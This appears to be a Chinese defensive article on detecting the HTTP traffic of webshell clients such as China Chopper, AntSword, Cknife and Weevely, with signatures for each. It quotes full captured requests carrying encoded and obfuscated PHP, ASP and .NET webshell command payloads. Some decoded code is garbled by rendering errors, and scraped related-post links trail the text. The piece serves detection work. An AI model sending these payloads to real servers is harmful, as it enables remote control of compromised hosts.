常见WebShell客户端的流量特征及检测思路

01概述

开始之前先明确什么是webshell客户端?先问个问题,什么是客户端,什么是服务端?

很简单,提供服务的就是服务端,要求被服务的就是客户端。那么回到我们的场景中,如果已经种了后门,用于连接后门的程序是要求被服务的,比如执行个ps,目的是为了得到后门所在主机的进程列表,是“被服务“的,所以称之为客户端。本文将在后续介绍一系列有关webshell客户端的流量监测手法。

WebShell客户端是一种用于服务器上WebShell后门与攻击客户端之间进行通信的程序,我们通常可以根据WebShell客户端的流量来判断服务器上是否存在WebShell后门。

如今国内外常用的WebShell客户端有如下几种:

中国菜刀(使用量最大,适用范围最广的WebShell客户端);

蚁剑(一种常用的WebShell客户端);

冰蝎(流量加密客户端);

Cknife(C刀,使用Java语言编写)

Weevely(kali中的中国菜刀)。

接下来分别介绍其流量特征。

02中国菜刀(Chopper)

中国菜刀自诞生以来已经历了多个版本的更新,其功能、隐秘性也随着更新得到很大提升。菜刀现在主流有三个版本在使用,分别为2011版、2014版、2016版,这三个版本中从2011版本到2014版本是功能性上进行了增强,从2014版本到2016版本是在隐秘性上进行了增强,2016版本的菜刀流量加入了混淆,使其链接流量更具有混淆性。

中国菜刀基本支持PHP、JSP、ASP这三种WebShell的连接,这三种语言所对应的流量各有差异,各个版本也有不用。下面将按照不同版本不同语言组合进行分析。其中2011版和2014版菜刀流量特征基本一致,所以放在一起分析。

中国菜刀2011版本及2014版本各语言WebShell链接流量特征

(1)PHP类WebShell链接流量

POST /webshell.php HTTP/1.1

Cache-Control: no-cache

X-Forwarded-For: 40.83.114.50

Referer: http://192.168.180.226

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)

Host: 192.168.180.226

Content-Length: 685

Connection: Close

=%40eval%01%28base64_decode%28%24_POST%5Bz0%5D%29%29%3B&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskRD1kaXJuYW1lKCRfU0VSVkVSWyJTQ1JJUFRfRklMRU5BTUUiXSk7aWYoJEQ9PSIiKSREPWRpcm5hbWUoJF9TRVJWRVJbIlBBVEhfVFJBTlNMQVRFRCJdKTskUj0ieyREfVx0IjtpZihzdWJzdHIoJEQsMCwxKSE9Ii8iKXtmb3JlYWNoKHJhbmdlKCJBIiwiWiIpIGFzICRMKWlmKGlzX2RpcigieyRMfToiKSkkUi49InskTH06Ijt9JFIuPSJcdCI7JHU9KGZ1bmN0aW9uX2V4aXN0cygncG9zaXhfZ2V0ZWdpZCcpKT9AcG9zaXhfZ2V0cHd1aWQoQHBvc2l4X2dldGV1aWQoKSk6Jyc7JHVzcj0oJHUpPyR1WyduYW1lJ106QGdldF9jdXJyZW50X3VzZXIoKTskUi49cGhwX3VuYW1lKCk7JFIuPSIoeyR1c3J9KSI7cHJpbnQgJFI7O2VjaG8oInw8LSIpO2RpZSgpOw%3D%3D

其中特征主要在body中,将body中流量进行url解码后如下:

=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRD1kaXJuYW1lKCRfU0VSVkVSWyJTQ1JJUFRfRklMRU5BTUUiXSk7aWYoJEQ9PSIiKSREPWRpcm5hbWUoJF9TRVJWRVJbIlBBVEhfVFJBTlNMQVRFRCJdKTskUj0ieyREfVx0IjtpZihzdWJzdHIoJEQsMCwxKSE9Ii8iKXtmb3JlYWNoKHJhbmdlKCJBIiwiWiIpIGFzICRMKWlmKGlzX2RpcigieyRMfToiKSkkUi49InskTH06Ijt9JFIuPSJcdCI7JHU9KGZ1bmN0aW9uX2V4aXN0cygncG9zaXhfZ2V0ZWdpZCcpKT9AcG9zaXhfZ2V0cHd1aWQoQHBvc2l4X2dldGV1aWQoKSk6Jyc7JHVzcj0oJHUpPyR1WyduYW1lJ106QGdldF9jdXJyZW50X3VzZXIoKTskUi49cGhwX3VuYW1lKCk7JFIuPSIoeyR1c3J9KSI7cHJpbnQgJFI7O2VjaG8oInw8LSIpO2RpZSgpOw==

其中特征点有如下三部分,

第一:“eval”,eval函数用于执行传递的攻击payload,这是必不可少的;

第二:(base64_decode(POST[z0])),(base64decode(_POST[z0])),(base64_decode(P​OST[z0])),(base64d​ecode(_POST[z0]))将攻击payload进行Base64解码,因为菜刀默认是将攻击载荷使用Base64编码,以避免被检测;

第三:&z0=QGluaV9zZXQ…,该部分是传递攻击payload,此参数z0对应$_POST[z0]接收到的数据,该参数值是使用Base64编码的,所以可以利用base64解码可以看到攻击明文。

注:

1.有少数时候eval方法会被assert方法替代。

2.POST也会被_POST也会被P​OST也会被_GET、$_REQUEST替代。

3.z0是菜刀默认的参数,这个地方也有可能被修改为其他参数名。

(2)JSP类WebShell链接流量:

POST /muma.jsp HTTP/1.1

Cache-Control: no-cache

X-Forwarded-For: 213.225.150.214

Referer: http://192.200.41.103

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)

Host: 192.200.41.103:8090

Content-Length: 13

Connection: Close

i=A&z0=GB2312

该流量是WebShell链接流量的第一段链接流量,其中特征主要在i=A&z0=GB2312,菜刀链接JSP木马时,第一个参数定义操作,其中参数值为A-Q,如i=A,第二个参数指定编码,其参数值为编码,如z0=GB2312,有时候z0后面还会接着又z1=参数用来加入攻击载荷。

注:其中参数名i、z0、z1这种参数名是会变的,但是其参数值以及这种形式是不会变得,最主要就是第一个参数值在A-Q,这种是不变的。

(3)ASP类WebShell链接流量:

POST /server.asp HTTP/1.1

Cache-Control: no-cache

X-Forwarded-For: 177.169.197.49

Referer: http://192.168.180.226

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)

Host: 192.168.180.226

Content-Length: 968

Connection: Close

caidao=Execute(“Execute(”“On+Error+Resume+Next:Function+bd%28byVal+s%29%3AFor+i%3D1+To+Len%28s%29+Step+2%3Ac%3DMid%28s%2Ci%2C2%29%3AIf+IsNumeric%28Mid%28s%2Ci%2C1%29%29+Then%3AExecute%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26%22%22%22%22%29%22%22%22%22%29%3AElse%3AExecute%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26Mid%28s%2Ci%2B2%2C2%29%26%22%22%22%22%29%22%22%22%22%29%3Ai%3Di%2B2%3AEnd+If%22%22%26chr%2810%29%26%22%22Next%3AEnd+Function:Response.Write(”“”“->|”“”“):Execute(”“”“On+Error+Resume+Next:”“”“%26bd(”“”“44696D20533A533D5365727665722E4D61707061746828222E2229266368722839293A53455420433D4372656174654F626A6563742822536372697074696E672E46696C6553797374656D4F626A65637422293A496620457272205468656E3A4572722E436C6561723A456C73653A466F722045616368204420696E20432E4472697665733A533D5326442E44726976654C657474657226636872283538293A4E6578743A456E642049663A526573706F6E73652E5772697465285329"”“”)):Response.Write(“”“”|<-“”“”):Response.End"“)”)

其中body流量进行URL解码后

caidao=Execute(“Execute(”“On Error Resume Next:Function bd(byVal s):For i=1 To Len(s) Step 2:c=Mid(s,i,2):If IsNumeric(Mid(s,i,1)) Then:Execute(”“”“bd=bd&chr(&H”“”“&c&”“”“)”“”“):Else:Execute(”“”“bd=bd&chr(&H”“”“&c&Mid(s,i+2,2)&”“”“)”“”“):i=i+2:End If”“&chr(10)&”“Next:End Function:Response.Write(”“”“->|”“”“):Execute(”“”“On Error Resume Next:”“”“&bd(”“”“44696D20533A533D5365727665722E4D61707061746828222E2229266368722839293A53455420433D4372656174654F626A6563742822536372697074696E672E46696C6553797374656D4F626A65637422293A496620457272205468656E3A4572722E436C6561723A456C73653A466F722045616368204420696E20432E4472697665733A533D5326442E44726976654C657474657226636872283538293A4E6578743A456E642049663A526573706F6E73652E5772697465285329"”“”)):Response.Write(“”“”|<-“”“”):Response.End"“)”)

其中特征点有如下三部分,

第一:“Execute”,Execute函数用于执行传递的攻击payload,这是必不可少的,这个等同于php类中eval函数;

第二:OnError ResumeNext,这部分是大部分ASP客户端中必有的流量,能保证不管前面出任何错,继续执行以下代码。

第三:Response.Write和Response.End是必有的,是来完善整个操作的。

这种流量主要识别这几部分特征,在正常流量中基本没有。

注:OnError Resume Next这个特征在大部分流量中存在,极少数情况没有。

中国菜刀2016版本各语言WebShell链接流量特征

PHP类WebShell链接流量

POST /webshell.php HTTP/1.1

X-Forwarded-For: 50.182.119.137

Referer: http://192.168.180.226/

Content-Type: application/x-www-form-urlencoded

Host: 192.168.180.226

Content-Length: 673

Cache-Control: no-cache

=array_map(“ass”.“ert”,array(“ev”.“Al(”\$xx%3D\“Ba”.“SE6”.“4_dEc”.“OdE\”;@ev".“al(\$xx(‘QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtpZihQSFBfVkVSU0lPTjwnNS4zLjAnKXtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO307ZWNobygiWEBZIik7JEQ9ZGlybmFtZShfX0ZJTEVfXyk7JFI9InskRH1cdCI7aWYoc3Vic3RyKCRELDAsMSkhPSIvIil7Zm9yZWFjaChyYW5nZSgiQSIsIloiKSBhcyAkTClpZihpc19kaXIoInskTH06IikpJFIuPSJ7JEx9OiI7fSRSLj0iXHQiOyR1PShmdW5jdGlvbl9leGlzdHMoJ3Bvc2l4X2dldGVnaWQnKSk%2FQHBvc2l4X2dldHB3dWlkKEBwb3NpeF9nZXRldWlkKCkpOicnOyR1c3I9KCR1KT8kdVsnbmFtZSddOkBnZXRfY3VycmVudF91c2VyKCk7JFIuPXBocF91bmFtZSgpOyRSLj0iKHskdXNyfSkiO3ByaW50ICRSOztlY2hvKCJYQFkiKTtkaWUoKTs%3D’));”);"));

其中特征主要在body中,将body中部分如下:

=array_map(“ass”.“ert”,array(“ev”.“Al(”\$xx%3D\“Ba”.“SE6”.“4_dEc”.“OdE\”;@ev".“al(\$xx(‘QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtpZihQSFBfVkVSU0lPTjwnNS4zLjAnKXtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO307ZWNobygiWEBZIik7JEQ9ZGlybmFtZShfX0ZJTEVfXyk7JFI9InskRH1cdCI7aWYoc3Vic3RyKCRELDAsMSkhPSIvIil7Zm9yZWFjaChyYW5nZSgiQSIsIloiKSBhcyAkTClpZihpc19kaXIoInskTH06IikpJFIuPSJ7JEx9OiI7fSRSLj0iXHQiOyR1PShmdW5jdGlvbl9leGlzdHMoJ3Bvc2l4X2dldGVnaWQnKSk%2FQHBvc2l4X2dldHB3dWlkKEBwb3NpeF9nZXRldWlkKCkpOicnOyR1c3I9KCR1KT8kdVsnbmFtZSddOkBnZXRfY3VycmVudF91c2VyKCk7JFIuPXBocF91bmFtZSgpOyRSLj0iKHskdXNyfSkiO3ByaW50ICRSOztlY2hvKCJYQFkiKTtkaWUoKTs%3D’));”);"));

这个版本中流量最大的改变就是将特征进行打断混淆,这也给我们识别特征提供一种思路。

其中特征点有如下三部分,

第一:““Ba”.“SE6”.“4_dEc”."OdE”,这部分是将base64解码打断使用.来连接。

第二:@ev"."al,这部分也是将@eval这部分进行打断连接,可以识别这段代码即可。

第三:QGluaV9zZXQoImRpc3BsYXlf…,该部分是传递攻击payload,payload依旧使用Base64编码的,所以可以利用base64解码可以看到攻击明文来识别。

注:1.有少数时候eval方法会被assert方法替代。

JSP类WebShell链接流量:

POST /muma.jsp HTTP/1.1

X-Forwarded-For: 89.21.63.3

Referer: http://192.200.41.103:8090/

Content-Type: application/x-www-form-urlencoded

Host: 192.200.41.103:8090

Content-Length: 20

Cache-Control: no-cache

=A&z0=GB2312&z1=&z2=

该版本JSPwebshell流量与之前版本一样,

所以分析如上:该流量是WebShell链接流量的第一段链接流量,其中特征主要在i=A&z0=GB2312,菜刀链接JSP木马时,第一个参数定义操作,其中参数值为A-Q,如i=A,第二个参数指定编码,其参数值为编码,如z0=GB2312,有时候z0后面还会接着又z1=、z2=参数用来加入攻击载荷。

注:其中参数名i、z0、z1这种参数名是会变的,但是其参数值以及这种形式是不会变得,最主要就是第一个参数值在A-Q,这种是不变的。

ASP类WebShell链接流量:

POST /server.aspx HTTP/1.1

X-Forwarded-For: 121.125.8.145

Referer: http://192.168.180.226/

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)

Host: 192.168.180.226

Content-Length: 639

Cache-Control: no-cache

caidao=%u0052%u0065sponse%u002E%u0057rit%u0065(“X@Y”);var %u0065rr:%u0045xc%u0065ption;

%u0074ry%u007B%u0065val(Syst%u0065m%u002ET%u0065xt%u002E%u0045ncoding%u002EG%u0065t%u0045ncoding(936)%u002EG%u0065tString(Syst%u0065m.Conv%u0065rt%u002EFromBas%u006564String(“dmFyIGM9U3lzdGVtLklPLkRpcmVjdG9yeS5HZXRMb2dpY2FsRHJpdmVzKCk7UmVzcG9uc2UuV3JpdGUoU2VydmVyLk1hcFBhdGgoIi8iKSsiXHQiKTtmb3IodmFyIGk9MDtpPD1jLmxlbmd0aC0xO2krKylSZXNwb25zZS5Xcml0ZShjW2ldWzBdKyI6Iik7”)),“unsaf%u0065”);

%u007Dcatch(err)%u007B%u0052esponse%u002E%u0057rite(“ER”%2B"ROR:// "%2Berr.message);%u007D%u0052%u0065sponse.%u0057rit%u0065(“X@Y”);%u0052espons%u0065.%u0045nd();

其中body流量为:

caidao=%u0052%u0065sponse%u002E%u0057rit%u0065(“X@Y”);var %u0065rr:%u0045xc%u0065ption;

%u0074ry%u007B%u0065val(Syst%u0065m%u002ET%u0065xt%u002E%u0045ncoding%u002EG%u0065t%u0045ncoding(936)%u002EG%u0065tString(Syst%u0065m.Conv%u0065rt%u002EFromBas%u006564String(“dmFyIGM9U3lzdGVtLklPLkRpcmVjdG9yeS5HZXRMb2dpY2FsRHJpdmVzKCk7UmVzcG9uc2UuV3JpdGUoU2VydmVyLk1hcFBhdGgoIi8iKSsiXHQiKTtmb3IodmFyIGk9MDtpPD1jLmxlbmd0aC0xO2krKylSZXNwb25zZS5Xcml0ZShjW2ldWzBdKyI6Iik7”)),“unsaf%u0065”);

%u007Dcatch(err)%u007B%u0052esponse%u002E%u0057rite(“ER”%2B"ROR:// "%2Berr.message);%u007D%u0052%u0065sponse.%u0057rit%u0065(“X@Y”);%u0052espons%u0065.%u0045nd();

2016版本流量这链接流量最大的变化在于body中部分字符被unicode编码替换混淆,所以这种特征需要提取出一种形式来,匹配这个混淆特征,比如“字符+%u0000+字符+%u0000”这种形式来判断该流量。

或者直接将这部分代码直接进行unicode解码,可以获取到如2011或2014版本的asp所示的流量。可以根据上一段特征来进行判断。

这种流量主要识别这几部分特征,在正常流量中基本没有。

03中国蚁剑(AntSword)

蚁剑的很多代码源于中国菜刀,所以他的链接流量与中国菜刀很相似,但是蚁剑可以扩充性很好,可以对进行加密、混淆等绕过处理。蚁剑默认支持ASP以及PHP的webshell链接。

蚁剑PHP类WebShell链接流量

POST /uploadfiles/shell.php HTTP/1.1

Host: 192.168.180.226

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

Content-Length: 889

Connection: close

cmd=%40ini_set%28%22display_errors%22%2C%20%220%22%29%3B%40set_time_limit%280%29%3Becho%20%225434f%22%3Btry%7B%24D%3Ddirname%28%24_SERVER%5B%22SCRIPT_FILENAME%22%5D%29%3Bif%28%24D%3D%3D%22%22%29%24D%3Ddirname%28%24_SERVER%5B%22PATH_TRANSLATED%22%5D%29%3B%24R%3D%22%7B%24D%7D%09%22%3Bif%28substr%28%24D%2C0%2C1%29%21%3D%22%2F%22%29%7Bforeach%28range%28%22C%22%2C%22Z%22%29as%20%24L%29if%28is_dir%28%22%7B%24L%7D%3A%22%29%29%24R.%3D%22%7B%24L%7D%3A%22%3B%7Delse%7B%24R.%3D%22%2F%22%3B%7D%24R.%3D%22%09%22%3B%24u%3D%28function_exists%28%22posix_getegid%22%29%29%3F%40posix_getpwuid%28%40posix_geteuid%28%29%29%3A%22%22%3B%24s%3D%28%24u%29%3F%24u%5B%22name%22%5D%3A%40get_current_user%28%29%3B%24R.%3Dphp_uname%28%29%3B%24R.%3D%22%09%7B%24s%7D%22%3Becho%20%24R%3B%3B%7Dcatch%28Exception%20%24e%29%7Becho%20%22ERROR%3A%2F%2F%22.%24e-%3EgetMessage%28%29%3B%7D%3Becho%20%220a5f4%22%3Bdie%28%29%3B

其中body流量进行URL解码后为:

cmd=@ini_set(“display_errors”, “0”);

@set_time_limit(0);echo “5434f”;try{D=dirname(D=dirname(D=dirname(_SERVER[“SCRIPT_FILENAME”]);

if(D=="")D=="")D=="")D=dirname(SERVER["PATHTRANSLATED"]);_SERVER["PATH_TRANSLATED"]);S​ERVER["PATHT​RANSLATED"]);R="{$D} ";

if(substr($D,0,1)!=“/”){foreach(range(“C”,“Z”)as $L)

if(is_dir(“{KaTeX parse error: Expected 'EOF', got '}' at position 2: L}̲:"))R.=”{KaTeX parse error: Expected 'EOF', got '}' at position 2: L}̲:";}else{R.=“/”;}$R.=" ";

u=(functionexists("posixgetegid"))?@posixgetpwuid(@posixgeteuid()):"";u=(function_exists("posix_getegid"))?@posix_getpwuid(@posix_geteuid()):"";u=(functione​xists("posixg​etegid"))?@posixg​etpwuid(@posixg​eteuid()):"";s=(u)?u)?u)?u[“name”]:@get_current_user();

R.=phpuname();R.=php_uname();R.=phpu​name();R.=" {$s}";

echo $R;;}catch(Exception KaTeX parse error: Expected '}', got 'EOF' at end of input: …cho "ERROR://".e->getMessage();};echo “0a5f4”;die();

其中流量最中明显的特征为**@ini_set(“display_errors”,“0”);**这段代码基本是所有WebShell客户端链接PHP类WebShell都有的一种代码,但是有的客户端会将这段编码或者加密,而蚁剑是明文,所以较好发现。

蚁剑ASP类WebShell链接流量

POST /uploadfiles/shell.php HTTP/1.1

Host: 192.168.180.226

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

Content-Length: 1248

Connection: close

cmd=eval%28%22Ex%22%26cHr%28101%29%26%22cute%28%22%22Server.ScriptTimeout%3D3600%3AOn%20Error%20Resume%20Next%3AFunction%20bd%28byVal%20s%29%3AFor%20i%3D1%20To%20Len%28s%29%20Step%202%3Ac%3DMid%28s%2Ci%2C2%29%3AIf%20IsNumeric%28Mid%28s%2Ci%2C1%29%29%20Then%3AExecute%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26%22%22%22%22%29%22%22%22%22%29%3AElse%3AExecute%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26Mid%28s%2Ci%2B2%2C2%29%26%22%22%22%22%29%22%22%22%22%29%3Ai%3Di%2B2%3AEnd%20If%22%22%26chr%2810%29%26%22%22Next%3AEnd%20Function%3AResponse.Write%28%22%22%22%22a6bbf%22%22%22%22%29%3AEx%22%26cHr%28101%29%26%22cute%28%22%22%22%22On%20Error%20Resume%20Next%3A%22%22%22%22%26bd%28%22%22%22%2244696D20533A53455420433D4372656174654F626A6563742822536372697074696E672E46696C6553797374656D4F626A65637422293A496620457272205468656E3A533D224552524F523A2F2F2022264572722E4465736372697074696F6E3A4572722E436C6561723A456C73653A533D5365727665722E4D61707061746828222E2229266368722839293A466F722045616368204420696E20432E4472697665733A533D5326442E44726976654C657474657226636872283538293A4E6578743A456E642049663A526573706F6E73652E5772697465285329%22%22%22%22%29%29%3AResponse.Write%28%22%22%22%226a525%22%22%22%22%29%3AResponse.End%22%22%29%22%29

其中body流量进行URL解码后为:

cmd=eval(“Ex”&cHr(101)&“cute(”“Server.ScriptTimeout=3600:On Error Resume Next:Function bd(byVal s):For i=1 To Len(s) Step 2:c=Mid(s,i,2):If IsNumeric(Mid(s,i,1)) Then:Execute(”“”“bd=bd&chr(&H”“”“&c&”“”“)”“”“):Else:Execute(”“”“bd=bd&chr(&H”“”“&c&Mid(s,i+2,2)&”“”“)”“”“):i=i+2:End If”“&chr(10)&”“Next:End Function:Response.Write(”“”“a6bbf”“”“):Ex”&cHr(101)&“cute(”“”“On Error Resume Next:”“”“&bd(”“”“44696D20533A53455420433D4372656174654F626A6563742822536372697074696E672E46696C6553797374656D4F626A65637422293A496620457272205468656E3A533D224552524F523A2F2F2022264572722E4465736372697074696F6E3A4572722E436C6561723A456C73653A533D5365727665722E4D61707061746828222E2229266368722839293A466F722045616368204420696E20432E4472697665733A533D5326442E44726976654C657474657226636872283538293A4E6578743A456E642049663A526573706F6E73652E5772697465285329"”“”)):Response.Write(“”““6a525"””“):Response.End”“)”)

我们可以看出蚁剑针对ASP类的WebShell流量与菜刀的流量很像,其中特征也是相同,如OnError ResumeNext、Response.End、Response.Write,其中execute在蚁剑中被打断混淆了,变成了拼接形式Ex"&cHr(101)&"cute,同时该流量中也使用了eval参数,可以被认为明显特征。

蚁剑绕过特征流量

由于蚁剑中包含了很多加密、绕过插件,所以导致很多流量被加密后无法识别,但是蚁剑混淆加密后还有一个比较明显的特征,即为参数名大多以“_0x…=”这种形式(下划线可替换为其他)

所以,以_0x开头的参数名,后面为加密数据的数据包也可识别为蚁剑的流量特征。

04冰蝎

其中冰蝎是近几年出现的一种WebShell客户端,该链接器最大的特点就是流量进行加密,且加密秘钥是由使用者来设定,但是该拦截器对WebShell的需求比较高,无法连接一句话木马,综上,该客户端的流量无法检测。

关于其工作原理及功能介绍作者已经详细介绍:

功能介绍链接:

《利用动态二进制加密实现新型一句话木马之客户端篇》https://xz.aliyun.com/t/2799

工作原理链接:

《利用动态二进制加密实现新型一句话木马之Java篇》https://xz.aliyun.com/t/2744

《利用动态二进制加密实现新型一句话木马之.NET篇》https://xz.aliyun.com/t/2758

《利用动态二进制加密实现新型一句话木马之PHP篇》https://xz.aliyun.com/t/2774

05Cknife

Cknife流量的特征就是在body部分的参数值均为base64编码,将该部分进行base64解码后,其流量特征同中国菜刀一致,所以不再另行展开分析

06Weevely

Weevely是kail中自带的一款功能强大的WebShell客户端,该链接器首先自己生成webshell,在将该webshell上传至目的服务器后,通过Weevely进行链接,该链接流量属于加密流量,但是在该流量中还可以发现特征,进行区分。

GET /1.php HTTP/1.1

Accept-Encoding: identity

Accept-Language: yi-YI,pi;q=0.4,ps;q=0.6

Connection: close

Accept: text/html,text/plain;0.9,application/xml;0.8,application/xhtml+xml;0.6,/

User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10 GTB7.1

Host: 192.168.180.226

Cookie: PHPSESSID=bbc97776857c779ad2f37d78b0b9064f

Referer: http://www.google.com.uy/url?sa=t&rct=j&source=web&cd=572&ved=DfoNma8EW&url=168.180&ei=wMe1ch8itcFEwSremerALK&usg=1IssmLxJeA7JpizoopzuJyD7NUDEzAqMzr该流量中的攻击载荷存在于Referer中,其中Referer中的路径中php的查询参数有以下参数名或值,即sa=、source=web、cd=数字、url=、ei=,即可确定该流量为客户端流量。

常见WebShell客户端的流量特征及检测思路相关推荐

  1. webshell客户端流量特征

    webshell客户端流量特征 目录 1. 冰蝎 2. 中国菜刀 3. Cknife 4. 蚁剑 5. 哥斯拉 webshell客户端 用于webshell后门和攻击者之间的通信程序,我们可以通过we ...

  2. 常见webshell工具

    WebShell客户端是一种用于服务器上WebShell后门与攻击客户端之间进行通信的程序,我们通常可以根据WebShell客户端的流量来判断服务器上是否存在WebShell后门.[注:本机安装环境为 ...

  3. 兵临城下丨Webshell管理工具流量检测研究

    引言 俗话说得好,80后用菜刀,90后用蚁剑,95后用冰蝎和哥斯拉.本文主要是对这四个主流的并具有跨时代意义的webshell管理工具进行流量分析和检测. 注:本文均以phpshell连接为例进行研究 ...

  4. 几点基于Web日志的Webshell检测思路

    摘要: Web日志记录了网站被访问的情况,在Web安全的应用中,Web日志常被用来进行攻击事件的回溯和取证.Webshell大多由网页脚本语言编写,常被入侵者用作对网站服务器操作的后门程序,网站被植入 ...

  5. 加密恶意流量检测思路分析

    文章目录 背景及现状 加密恶意流量特征分析 特征类别 特征提取 加密恶意流量检测流程 数据采集 特征工程 模型训练 参考资料 背景及现状 为了确保通信安全和隐私以及应对各种窃听和中间人攻击,HTTPS ...

  6. 菜刀、冰蝎、蚁剑、哥斯拉的流量特征

    干货|菜刀.冰蝎.蚁剑.哥斯拉的流量特征 文章目录 干货|菜刀.冰蝎.蚁剑.哥斯拉的流量特征 菜刀流量特征 蚁剑(PHP用base64加密): 冰蝎(AES对称加密): 哥斯拉(base64加密): ...

  7. webshell使用与流量分析(含数据包)

    零基础学黑客,搜索公众号:白帽子左一 作者:掌控安全学员-逍遥子 一.菜刀 1.使用方法 菜刀的使用简单,将一句话木马上传到目标,然后直接使用菜刀连接即可,菜刀主要可以对目标进行虚拟终端,文件操作,数 ...

  8. 菜刀,蚁剑,冰蝎,哥斯拉的流量特征

    蚁剑: ini_set ini_set_time ini_set_limit @ini_set("display_errors","0") 部分代码明文传输,较 ...

  9. flowcontainer: 基于python3的pcap网络流量特征信息提取库

    库介绍 flowcontainer是由信息工程研究所智能信息对抗组开源的基于python3的网络流量基本信息提取库,以方便完成网络流量的分析任务.给定pcap文件,该库会提取pcap所有的流的相关信息 ...

最新文章

  1. C语言中整型浮点型在计算机中的存储
  2. Apache 配置关闭文件目录浏览
  3. python ln2怎么写_Python2和3切换默认
  4. Yii2中限制访问某控制器的IP(IP白名单)
  5. 《大话数据结构》读书笔记-图
  6. 7-27 兔子繁衍问题(15 分)
  7. storm基础系列之五---------接入数据收集系统flume
  8. linux 设备节点 驱动,【Linux驱动】自动创建设备节点
  9. phpmailer发送邮件
  10. C++中如何去掉std::string对象的首尾空格
  11. pg与oracle区别,PostgresQL 学习记录之与oracle区别(一)
  12. PyTorch | torch.tensor使用方法,如何使用torch.tensor
  13. 一招教你在linux服务器配置Jenkins持续集成神器
  14. 困了累了到底喝啥?浅谈饮料品牌如何进行推广策略定位
  15. linux后门rootkit程序介绍
  16. linux系统开机自动锁定键盘,设置linux开机启动小键盘的详细教程设置linux开机启动小键盘的图文教程...
  17. 实例:泰坦尼克号幸存者的预测
  18. 2021年金属非金属矿山(地下矿山)主要负责人模拟考试题库及金属非金属矿山(地下矿山)主要负责人复审模拟考试
  19. 北邮计算机周安福,周安福
  20. 著名的Oracle公司中文名字为什么叫“甲骨文”?

热门文章

  1. assign和weak之间的区别
  2. python数据挖掘(1.亲和性分析)
  3. 把网页保存成markdowm的方法
  4. 电气火灾监控系统在杭州湾新区产业园区一期的设计与应用——安科瑞 陆琳钰
  5. 怎么实现文字转语音朗读?这几个小技巧快来码住
  6. AndroidStudio问题XML格式化
  7. python支持复数以及相关的运算吗_python怎么实现复数运算
  8. ScriptManager脚本管理器
  9. ntoskrnl.exe文件丢失或损坏的问题解决方法
  10. 统计项目代码行数 intelliJ idea statistic 插件